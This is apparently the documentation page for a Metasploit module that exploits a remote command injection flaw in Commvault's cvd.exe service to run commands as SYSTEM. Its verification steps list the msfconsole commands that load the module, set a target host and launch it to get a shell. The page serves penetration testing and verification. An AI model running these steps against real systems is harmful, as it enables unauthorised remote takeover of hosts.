## Vulnerable Application


This module exploits a remote command injection vulnerability in the Commvault Communications service (cvd.exe). Exploitation of this vulnerability can allow for remote command execution as SYSTEM.


Additional information can be found [here](https://www.securifera.com/advisories/sec-2017-0001/)



## Verification Steps

1. Start msfconsole

2. `use exploit/windows/misc/commvault_cmd_exec`

3. `set RHOST [ip]`

4. `exploit`

5. shellz :)